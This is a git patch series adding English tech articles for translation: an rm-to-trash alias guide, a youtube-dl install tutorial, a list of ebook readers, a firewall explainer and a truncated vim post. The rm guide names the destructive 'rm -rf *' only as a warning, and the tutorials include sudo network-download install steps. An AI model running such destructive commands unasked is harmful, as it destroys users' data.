diff --git a/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md b/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
new file mode 100644
index 0000000000..17c37f38a1
--- /dev/null
+++ b/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
@@ -0,0 +1,113 @@
+Make “rm” Command To Move The Files To “Trash Can” Instead Of Removing Them Completely
+======
+Humans make mistakes because we are not programmed devices, so take extra care while using the `rm` command and never run `rm -rf *`. When you use the rm command it deletes files permanently; it does not move them to the `Trash Can` the way a file manager does.
+
+Sometimes we delete files by mistake and sometimes purely by accident, so what can we do when that happens? You have to turn to recovery tools (there are plenty of data recovery tools available for Linux), but there is no guarantee they can recover 100% of the data, so how do we avoid the situation in the first place?
+
+We recently published an article about [Trash-Cli][1]; in the comment section a user called Eemil Lgz pointed us to the [saferm.sh][2] script, which helps move files to the "Trash Can" instead of deleting them permanently.
+
+Moving files to the "Trash Can" is a good idea that saves you when you run an `rm` command accidentally, though some would call it a bad habit: if you do not look after the "Trash Can", it will accumulate files and folders over time. In that case I would advise you to create a cronjob to empty it on whatever schedule suits you.
+
+This works in both server and desktop environments. If the script detects a **GNOME, KDE, Unity, or LXDE** Desktop Environment (DE), it moves files or folders safely to the default trash location **$HOME/.local/share/Trash/files**; otherwise it creates a trash folder in your home directory, **$HOME/Trash**.
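+
+The gist of that behaviour can be sketched in a few lines of shell (this is only an illustration of the idea, not the actual saferm.sh code):
+```
+# pick a trash directory depending on whether a known desktop environment is running
+if [ -n "$XDG_CURRENT_DESKTOP" ] || [ -n "$GNOME_DESKTOP_SESSION_ID" ]; then
+    trash_dir="$HOME/.local/share/Trash/files"
+else
+    trash_dir="$HOME/Trash"
+fi
+mkdir -p "$trash_dir"
+mv -- "$1" "$trash_dir/"   # move the file into the trash instead of deleting it
+
+```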
+
+The saferm.sh script is hosted on GitHub; either clone the repository below or create a file called saferm.sh and paste the code into it.
+```
+$ git clone https://github.com/lagerspetz/linux-stuff
+$ sudo mv linux-stuff/scripts/saferm.sh /bin
+$ rm -Rf linux-stuff
+
+```
+
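+If the script did not keep its executable bit when it was copied, you may need to set it manually (using the same path as above):
+```
+$ sudo chmod +x /bin/saferm.sh
+
+```
+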
+Create an alias in your `bashrc` file.
+```
+alias rm=saferm.sh
+
+```
+
+For the alias to take effect, run the following command.
+```
+$ source ~/.bashrc
+
+```
+
+That's it. Now when you run the rm command, it automatically moves files to the "Trash Can" instead of deleting them permanently.
+
+For testing purposes, we are going to delete a file called `magi.txt`; the output clearly says `Moving magi.txt to $HOME/.local/share/Trash/files`.
+```
+$ rm -rf magi.txt
+Moving magi.txt to /home/magi/.local/share/Trash/files
+
+```
+
+The same can be validated with the `ls` command or the `trash-cli` utility.
+```
+$ ls -lh /home/magi/.local/share/Trash/files
+Permissions Size User Date Modified Name
+.rw-r--r-- 32 magi 11 Oct 16:24 magi.txt
+
+```
+
+Alternatively, we can check the same thing in the GUI through a file manager.
+[![][3]![][3]][4]
+
+Create a cronjob entry to empty the "Trash Can" once a week.
+```
+1 1 * * 0 trash-empty
+
+```
+
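+One way to install that entry non-interactively (it appends to the current user's crontab; running `crontab -e` and adding the line by hand works just as well):
+```
+$ (crontab -l 2>/dev/null; echo "1 1 * * 0 trash-empty") | crontab -
+
+```
+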
+`Note`: In a server environment, we need to remove the files manually using the rm command.
+```
+$ rm -rf /root/Trash/
+/root/Trash/magi1.txt is on . Unsafe delete (y/n)? y
+Deleting /root/Trash/magi1.txt
+
+```
+
+The same can be achieved with the trash-put command in a desktop environment.
+
+Create an alias in your `bashrc` file.
+```
+alias rm=trash-put
+
+```
+
+For the alias to take effect, run the following command.
+```
+$ source ~/.bashrc
+
+```
+
+To see the other options for saferm.sh, check its help output.
+```
+$ saferm.sh -h
+This is saferm.sh 1.16. LXDE and Gnome3 detection.
+ Will ask to unsafe-delete instead of cross-fs move. Allows unsafe (regular rm) delete (ignores trashinfo).
+ Creates trash and trashinfo directories if they do not exist. Handles symbolic link deletion.
+ Does not complain about different user any more.
+
+Usage: /path/to/saferm.sh [OPTIONS] [--] files and dirs to safely remove
+OPTIONS:
+-r allows recursively removing directories.
+-f Allow deleting special files (devices, ...).
+-u Unsafe mode, bypass trash and delete files permanently.
+-v Verbose, prints more messages. Default in this version.
+-q Quiet mode. Opposite of verbose.
+
+```
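+
+For example, based on the options above, you could recursively trash a directory or bypass the trash entirely (the file names here are just placeholders):
+```
+$ saferm.sh -r old-builds/        # move a directory and its contents to the trash
+$ saferm.sh -u useless-image.iso  # unsafe mode: delete permanently, bypassing the trash
+
+```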
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/rm-command-to-move-files-to-trash-can-rm-alias/
+
+作者:[2DAYGEEK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://www.2daygeek.com/trash-cli-command-line-trashcan-linux-system/
+[2]:https://github.com/lagerspetz/linux-stuff/blob/master/scripts/saferm.sh
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:https://www.2daygeek.com/wp-content/uploads/2017/10/rm-command-to-move-files-to-trash-can-rm-alias-1.png
From 3a6c790314f5fd390af0bd068b1a0db09ca38456 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:28:42 +0800
Subject: [PATCH 013/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Install=20and=20U?=
=?UTF-8?q?se=20YouTube-DL=20on=20Ubuntu=2016.04?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...tall and Use YouTube-DL on Ubuntu 16.04.md | 155 ++++++++++++++++++
1 file changed, 155 insertions(+)
create mode 100644 sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
diff --git a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
new file mode 100644
index 0000000000..dc0391768e
--- /dev/null
+++ b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
@@ -0,0 +1,155 @@
+translating by lujun9972
+Install and Use YouTube-DL on Ubuntu 16.04
+======
+
+Youtube-dl is a free and open source command-line video download tool that can be used to download videos from YouTube and other websites such as Facebook, Dailymotion, Google Video, Yahoo, and many more. It is written in Python, which is required to run it. It supports many operating systems, including Windows, Mac, and Unix. Youtube-dl supports resuming interrupted downloads, downloading whole channels or playlists, custom titles, proxies, and much more.
+
+In this tutorial, we will learn how to install and use Youtube-dl and Youtube-dlg on Ubuntu 16.04. We will also learn how to download YouTube videos in different qualities and formats.
+
+### Requirements
+
+ * A server running Ubuntu 16.04.
+ * A non-root user with sudo privileges set up on your server.
+
+
+
+Let's start by updating your system to the latest version with the following command:
+
+```
+sudo apt-get update -y
+sudo apt-get upgrade -y
+```
+
+After updating, restart the system to apply all these changes.
+
+### Install Youtube-dl
+
+By default, Youtube-dl is not available in the Ubuntu 16.04 repositories, so you will need to download it from its official website. You can download it with the curl command:
+
+First, install curl with the following command:
+
+sudo apt-get install curl -y
+
+Next, download the youtube-dl binary:
+
+sudo curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
+
+Next, change the permissions of the youtube-dl binary with the following command:
+
+sudo chmod 755 /usr/bin/youtube-dl
+
+Once youtube-dl is installed, you can proceed to the next step.
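+
+A quick way to verify the installation is to print the version (the exact version number will differ):
+```
+youtube-dl --version
+```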
+
+### Use Youtube-dl
+
+To list all the available youtube-dl options, run the following command:
+
+youtube-dl -h
+
+Youtube-dl supports many video formats such as MP4, WebM, 3GP, and FLV. You can list all the available formats for a specific video with the following command:
+
+youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+You should see all the available formats for this video, as below:
+```
+[info] Available formats for j_JgXJ-apXs:
+format code extension resolution note
+139 m4a audio only DASH audio 56k , m4a_dash container, [[email protected]][1] 48k (22050Hz), 756.44KiB
+249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
+250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
+171 webm audio only DASH audio 110k , [[email protected]][1], 1.32MiB
+251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
+140 m4a audio only DASH audio 146k , m4a_dash container, [[email protected]][1] (44100Hz), 1.97MiB
+278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
+160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
+133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
+242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
+134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
+243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
+135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
+244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
+247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
+136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
+248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
+137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
+17 3gp 176x144 small , mp4v.20.3, [[email protected]][1] 24k
+36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
+43 webm 640x360 medium , vp8.0, [[email protected]][1]
+18 mp4 640x360 medium , avc1.42001E, [[email protected]][1] 96k
+22 mp4 1280x720 hd720 , avc1.64001F, [[email protected]][1] (best)
+
+```
+
+Next, choose any format you want to download with the flag -f as shown below:
+
+youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+This command will download the video in MP4 format at 640x360 resolution:
+```
+[youtube] j_JgXJ-apXs: Downloading webpage
+[youtube] j_JgXJ-apXs: Downloading video info webpage
+[youtube] j_JgXJ-apXs: Extracting video information
+[youtube] j_JgXJ-apXs: Downloading MPD manifest
+[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
+[download] 100% of 6.90MiB in 00:47
+
+```
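+
+Besides the numeric format codes, youtube-dl also understands selectors such as `best`, and the `-o` option sets the output filename template; for example (reusing the same video URL):
+```
+youtube-dl -f best -o '%(title)s.%(ext)s' https://www.youtube.com/watch?v=j_JgXJ-apXs
+```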
+
+If you want to download just the audio of a YouTube video in MP3 format, that is also possible with the following command:
+
+youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
+
+You can download all the videos of a specific channel by passing the channel's URL as shown below:
+
+youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
+
+If your network is behind a proxy, you can download the video using the --proxy flag as shown below:
+
+youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+To download many YouTube videos with a single command, first save all the video URLs in a file called youtube-list.txt and run the following command to download them all:
+
+youtube-dl -a youtube-list.txt
+
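+The list file is simply one URL per line; a minimal example using the video URL from earlier:
+```
+# one URL per line; reusing the example video from above
+printf '%s\n' 'https://www.youtube.com/watch?v=j_JgXJ-apXs' > youtube-list.txt
+youtube-dl -a youtube-list.txt
+```
+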
+### Install Youtube-dl GUI
+
+If you are looking for a graphical tool for youtube-dl, then youtube-dlg is the best choice for you. Youtube-dlg is a free and open source front-end for youtube-dl written in wxPython.
+
+By default, this tool is not available in the Ubuntu 16.04 repositories, so you will need to add a PPA for it.
+
+sudo add-apt-repository ppa:nilarimogard/webupd8
+
+Next, update your package repository and install youtube-dlg with the following command:
+
+sudo apt-get update -y
+sudo apt-get install youtube-dlg -y
+
+Once youtube-dlg is installed, you can launch it from the Unity Dash as shown below:
+
+[![][2]][3]
+
+[![][4]][5]
+
+You can now easily download any YouTube video you wish: just paste its URL into the URL field shown in the image above. Youtube-dlg is very useful for people who are not comfortable with the command line.
+
+### Conclusion
+
+Congratulations! You have successfully installed youtube-dl and youtube-dlg on your Ubuntu 16.04 server. You can now easily download videos from YouTube and any youtube-dl-supported site, in any format and size.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
+
+作者:[Hitesh Jethva][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:/cdn-cgi/l/email-protection
+[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
+[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
+[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
+[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
From 96bb9c66abc8c150958720cef407cb0e9dcbb1c7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:32:24 +0800
Subject: [PATCH 014/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=207=20Best=20eBook?=
=?UTF-8?q?=20Readers=20for=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20171012 7 Best eBook Readers for Linux.md | 189 ++++++++++++++++++
1 file changed, 189 insertions(+)
create mode 100644 sources/tech/20171012 7 Best eBook Readers for Linux.md
diff --git a/sources/tech/20171012 7 Best eBook Readers for Linux.md b/sources/tech/20171012 7 Best eBook Readers for Linux.md
new file mode 100644
index 0000000000..5198f1bdc0
--- /dev/null
+++ b/sources/tech/20171012 7 Best eBook Readers for Linux.md
@@ -0,0 +1,189 @@
+7 Best eBook Readers for Linux
+======
+**Brief:** In this article, we are covering some of the best ebook readers for Linux. These apps give a better reading experience and some will even help in managing your ebooks.
+
+![Best eBook readers for Linux][1]
+
+Lately, the demand for digital books has increased as people find it more comfortable to read a book on their handheld devices, Kindle or PC. For Linux users, there are various ebook apps that will serve your purpose of reading and organizing your ebook collection.
+
+In this article, we have compiled seven of the best ebook readers for Linux. These ebook readers are best suited for PDF, ePub and other ebook formats.
+
+## Best eBook readers for Linux
+
+I have provided installation instructions for Ubuntu as I am using Ubuntu right now. If you use [non-Ubuntu Linux distributions][2], you can find most of these eBook applications in the software repositories of your distro.
+
+### 1. Calibre
+
+[Calibre][3] is one of the most popular eBook apps for Linux. To be honest, it's a lot more than just a simple eBook reader. It's a complete eBook solution. You can even [create professional eBooks with Calibre][4].
+
+With a powerful eBook manager and an easy-to-use interface, it supports creating and editing eBooks. Calibre supports a variety of formats and syncing with other ebook readers. It also lets you convert one eBook format to another with ease.
+
+The biggest drawback of Calibre is that it's too heavy on resources and that makes it a difficult choice as a standalone eBook reader.
+
+![Calibre][5]
+
+#### Features
+
+ * Managing eBooks: Calibre allows sorting and grouping eBooks by managing metadata. You can download metadata for an eBook from various sources or create and edit the existing fields.
+ * Supports all major eBook formats: Calibre supports all major eBook formats and is compatible with various e-readers.
+ * File conversion: You can convert any ebook format to another one with the option of changing the book style, creating a table of contents or improving margins while converting. You can convert your personal documents to an ebook too.
+ * Download magazines from the web: Calibre can deliver stories from various news sources or through RSS feeds.
+ * Share and backup your library: It gives the option of hosting your eBook collection on its server, which you can share with your friends or access from anywhere, using any device. The backup and import/export features let you keep your collection safe and easily portable.
+
+
+
+#### Installation
+
+You can find it in the software repository of all major Linux distributions. For Ubuntu, search for it in the Software Center or use the command below:
+
+`sudo apt-get install calibre`
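+
+Calibre also ships a command-line converter, `ebook-convert`, which covers the file-conversion feature mentioned above; a quick sketch (the file names are placeholders):
+
+```
+# convert an ePub to MOBI; input and output names are placeholders
+ebook-convert my-book.epub my-book.mobi
+```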
+
+### 2. FBReader
+
+![FBReader: eBook reader for Linux][6]
+
+[FBReader][7] is an open source, lightweight, multi-platform ebook reader supporting various formats like ePub, fb2, mobi, rtf, html etc. It includes access to popular network libraries from where you can download ebooks for free or buy one.
+
+FBReader is highly customizable with options to choose colors, fonts, page-turning animations, bookmarks and dictionaries.
+
+#### Features
+
+ * Supports a variety of file formats and devices like Android, iOS, Windows, Mac and more.
+ * Synchronize book collection, reading positions and bookmarks.
+ * Manage your library online by adding any book from your Linux desktop to all your devices.
+ * Web browser access to your stored collection.
+ * Supports storage of books in Google Drive and organizing of books by authors, series or other attributes.
+
+
+
+#### Installation
+
+You can install the FBReader ebook reader from the official repository or by typing the command below in the terminal.
+```
+sudo apt-get install fbreader
+```
+
+Or, you can grab a .deb package from [here][8] and install it on your Debian-based distribution.
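+
+If you go the .deb route, installation is the usual dpkg procedure; a sketch assuming the downloaded file name:
+
+```
+# install the downloaded package and pull in any missing dependencies
+sudo dpkg -i fbreader_*.deb
+sudo apt-get install -f
+```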
+
+### 3. Okular
+
+[Okular][9] is another open source and cross-platform document viewer developed by KDE and is shipped as part of the KDE Application release.
+
+![Okular][10]
+
+#### Features
+
+ * Okular supports various document formats like PDF, Postscript, DjVu, CHM, XPS, ePub and others.
+ * Supports features like commenting on PDF documents, highlighting and drawing different shapes etc.
+ * These changes are saved separately without modifying the original PDF file.
+ * Text from an eBook can be extracted to a text file, and Okular has an inbuilt text-reading service called Jovie.
+
+
+
+Note: While checking the app, I discovered that it doesn't support the ePub file format in Ubuntu and its derivatives. Users of other distributions can still utilize its full potential.
+
+#### Installation
+
+Ubuntu users can install it by typing the command below in the terminal:
+```
+sudo apt-get install okular
+```
+
+### 4. Lucidor
+
+Lucidor is a handy e-book reader supporting the ePub file format and catalogs in the OPDS format. It also features organizing your collection of e-books in a local bookcase, searching and downloading from the internet, and converting web feeds and web pages into e-books.
+
+Lucidor is a XULRunner application, so it has a Firefox-like look with a tabbed layout and behaves similarly when storing data and configurations. It's the simplest ebook reader on the list and includes configuration options such as text justification and scrolling.
+
+![lucidor][11]
+
+You can look up the definition of a word from Wiktionary.org by selecting it and choosing right click > Lookup word. It also includes options to convert web feeds or web pages into e-books.
+
+You can download and install the deb or RPM package from [here][12].
+
+### 5. Bookworm
+
+![Bookworm eBook reader for Linux][13]
+
+Bookworm is another free and open source ebook reader supporting different file formats like ePub, PDF, MOBI, CBR and CBZ. I wrote a dedicated article on Bookworm's features and installation; read it here: [Bookworm: A Simple yet Magnificent eBook Reader for Linux][14]
+
+#### Installation
+```
+sudo apt-add-repository ppa:bookworm-team/bookworm
+sudo apt-get update
+sudo apt-get install bookworm
+```
+
+### 6. Easy Ebook Viewer
+
+[Easy Ebook Viewer][15] is another fantastic GTK Python app for reading ePub files. With features like basic chapter navigation, continuing from the last reading positions, importing from other ebook file formats, chapter jumping and more, Easy Ebook Viewer is a simple and minimalist ePub reader.
+
+![Easy-Ebook-Viewer][16]
+
+The app is still in its initial stage and has support for only ePub files.
+
+#### Installation
+
+You can install Easy Ebook Viewer by downloading the source code from [github][17] and compiling it yourself along with the dependencies. Alternatively, the following terminal commands will do the exact same job.
+```
+sudo apt install git gir1.2-webkit-3.0 libwebkitgtk-3.0-0 gir1.2-gtk-3.0 python3-gi
+git clone https://github.com/michaldaniel/Ebook-Viewer.git
+cd Ebook-Viewer/
+sudo make install
+```
+
+After successful completion of the above steps, you can launch it from the Dash.
+
+### 7. Buka
+
+[Buka][18] is mostly an ebook manager with a simple and clean user interface. It currently supports the PDF format and is designed to help the user focus more on the content. With all the basic features of a PDF reader, Buka lets you navigate with the arrow keys, offers zoom options, and can display two pages side by side.
+
+You can create separate lists of your PDF files and switch between them easily. Buka also provides a built-in translation tool but you need an active internet connection to use the feature.
+
+![Buka][19]
+
+#### Installation
+
+You can download an AppImage from the [official download page.][20] If you are not aware of it, read [how to use AppImage in Linux][21]. Alternatively, you can install it from the command line:
+```
+sudo snap install buka
+```
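+
+If you choose the AppImage instead, it only needs to be made executable and run; a minimal sketch, assuming the file name from the release page:
+
+```
+# make the AppImage executable and run it (file name assumed from the download)
+chmod +x Buka*.AppImage
+./Buka*.AppImage
+```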
+
+### Final Words
+
+Personally, I find Calibre best suited to my needs. Bookworm also looks promising to me, and I am using it more often these days. Still, the selection of an ebook application totally depends on your preference.
+
+Which ebook app do you use? Let us know in the comments below.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-ebook-readers-linux/
+
+作者:[Ambarish Kumar][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/ambarish/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/10/best-ebook-readers-linux-800x450.png
+[2]:https://itsfoss.com/non-ubuntu-beginner-linux/
+[3]:https://www.calibre-ebook.com
+[4]:https://itsfoss.com/create-ebook-calibre-linux/
+[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Calibre-800x603.jpeg
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/10/fbreader-800x624.jpeg
+[7]:https://fbreader.org
+[8]:https://fbreader.org/content/fbreader-beta-linux-desktop
+[9]:https://okular.kde.org/
+[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Okular-800x435.jpg
+[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/lucidor-2.png
+[12]:http://lucidor.org/lucidor/download.php
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/bookworm-ebook-reader-linux-800x450.jpeg
+[14]:https://itsfoss.com/bookworm-ebook-reader-linux/
+[15]:https://github.com/michaldaniel/Ebook-Viewer
+[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Easy-Ebook-Viewer.jpg
+[17]:https://github.com/michaldaniel/Ebook-Viewer.git
+[18]:https://github.com/oguzhaninan/Buka
+[19]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Buka2-800x555.png
+[20]:https://github.com/oguzhaninan/Buka/releases
+[21]:https://itsfoss.com/use-appimage-linux/
From 429d24ad537cbb8da284e9a5e1e5436843c0b40f Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:34:50 +0800
Subject: [PATCH 015/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20is=20a=20f?=
=?UTF-8?q?irewall=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171011 What is a firewall.md | 79 +++++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 sources/tech/20171011 What is a firewall.md
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
new file mode 100644
index 0000000000..fe1142b8a4
--- /dev/null
+++ b/sources/tech/20171011 What is a firewall.md
@@ -0,0 +1,79 @@
+What is a firewall?
+======
+Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
+
+A recent study by network testing firm NSS Labs found that up to 80% of large US businesses run a next-generation firewall. Research firm IDC estimates the firewall and related unified threat management market was a $7.6 billion industry in 2015 and is expected to reach $12.7 billion by 2020.
+
+ **[ If you're upgrading, here's [What to consider when deploying a next generation firewall][1].]**
+
+### What is a firewall?
+
+Firewalls act as a perimeter defense tool that monitors traffic and either allows it or blocks it. Over the years the functionality of firewalls has increased, and now most firewalls can not only block a set of known threats and enforce advanced access control list policies, but they can also deeply inspect individual packets of traffic and test packets to determine if they're safe. Most firewalls are deployed as network hardware that processes traffic and software that allows end users to configure and manage the system. Increasingly, software-only versions of firewalls are being deployed in highly virtualized environments to enforce policies on segmented networks or in the IaaS public cloud.
+
+Advancements in firewall technology have created new options for firewall deployments over the past decade, so now there are a handful of options for end users looking to deploy a firewall. These include:
+
+### Stateful firewalls
+
+When firewalls were first created they were stateless, meaning that the hardware the traffic traversed while being inspected examined each packet of network traffic individually, blocking or allowing it in isolation. Beginning in the mid-to-late 1990s, the first major advancement in firewalls was the introduction of state. Stateful firewalls examine traffic in a more holistic context, taking into account the operating state and characteristics of the network connection. Maintaining this state allows the firewall to permit certain traffic for certain users while blocking the same traffic for other users, for example.
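+
+To make the idea of "state" concrete, here is a minimal sketch of what a stateful rule set looks like with the Linux iptables packet filter (a host-level illustration, not any particular vendor's product):
+
+```
+# allow replies to connections this host initiated
+iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
+# allow brand-new inbound SSH connections only
+iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
+# drop everything else by default
+iptables -P INPUT DROP
+```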
+
+### Next-generation firewalls
+
+Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features into the firewall.
+
+### Proxy-based firewalls
+
+These firewalls act as a gateway between end users who request data and the source of that data. All traffic is filtered through this proxy before being passed on to the end user. This protects the client from exposure to threats by masking the identity of the original requester of the information.
+
+### Web application firewalls
+
+These firewalls sit in front of specific applications as opposed to sitting on an entry or exit point of a broader network. Whereas proxy-based firewalls are typically thought of as protecting end-user clients, WAFs are typically thought of as protecting the application servers.
+
+### Firewall hardware
+
+Firewall hardware is typically a straightforward server that can act as a router for filtering traffic and running firewall software. These devices are placed at the edge of a corporate network, between a router and the Internet service provider's connection point. A typical enterprise may deploy dozens of physical firewalls throughout a data center. Users need to determine what throughput capacity they need the firewall to support based on the size of the user base and speed of the Internet connection.
+
+### Firewall software
+
+Typically end users deploy multiple firewall hardware endpoints and a central firewall software system to manage the deployment. This central system is where policies and features are configured, where analysis can be done and threats can be responded to.
+
+### Next-generation firewalls
+
+Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features, and here is a description of some of them.
+
+### Stateful inspection
+
+This is the basic firewall functionality in which the device blocks known unwanted traffic.
+
+### Anti-virus
+
+This functionality searches for known viruses and vulnerabilities in network traffic and is aided by the firewall receiving updates on the latest threats so it stays protected against them.
+
+### Intrusion Prevention Systems (IPS)
+
+This class of security products can be deployed as a standalone product, but IPS functionality is increasingly being integrated into NGFWs. Whereas basic firewall technologies identify and block certain types of network traffic, IPS uses more granular security measures such as signature tracing and anomaly detection to prevent unwanted threats from entering corporate networks. IPS has superseded the previous version of this technology, Intrusion Detection Systems (IDS), which focused more on identifying threats than on containing them.
+
+### Deep Packet Inspection (DPI)
+
+DPI can be part of or used in conjunction with an IPS, but it's nonetheless become an important feature of NGFWs because of its ability to provide granular analysis of traffic, most specifically the headers of traffic packets and the traffic data itself. DPI can also be used to monitor outbound traffic to ensure sensitive information is not leaving corporate networks, a technology referred to as Data Loss Prevention (DLP).
+
+### SSL Inspection
+
+Secure Sockets Layer (SSL) Inspection is the idea of inspecting encrypted traffic to test for threats. As more and more traffic is encrypted, SSL Inspection is becoming an important component of the DPI technology being implemented in NGFWs. SSL Inspection acts as a buffer that decrypts the traffic before it's delivered to the final destination in order to test it.
+
+### Sandboxing
+
+This is one of the newer features being rolled into NGFWs and refers to the ability of a firewall to take certain unknown traffic or code and run it in a test environment to determine if it is nefarious.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-perimeter-stateful-inspection-next-generation.html
+
+作者:[Brandon Butler][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Brandon-Butler/
+[1]:https://www.networkworld.com/article/3236448/lan-wan/what-to-consider-when-deploying-a-next-generation-firewall.html
From 23ef82d1a848d4ce2cd4f1b9a29e8ab8e4bd7921 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:37:42 +0800
Subject: [PATCH 016/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Fixing=20vim=20in?=
=?UTF-8?q?=20Debian=20=E2=80=93=20There=20and=20back=20again?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ng vim in Debian - There and back again.md | 57 +++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 sources/tech/20171016 Fixing vim in Debian - There and back again.md
diff --git a/sources/tech/20171016 Fixing vim in Debian - There and back again.md b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
new file mode 100644
index 0000000000..0b67edcf63
--- /dev/null
+++ b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
@@ -0,0 +1,57 @@
+Fixing vim in Debian – There and back again
+======
+I was wondering for quite some time why vim on my server behaves so strangely with respect to the mouse: jumping around, copy and paste not working the usual way. All this despite having
+```
+ set mouse=
+```
+
+in my `/etc/vim/vimrc.local`. Finally I found out why, thanks to bug [#864074][1] and fixed it.
+
+![][2]
+
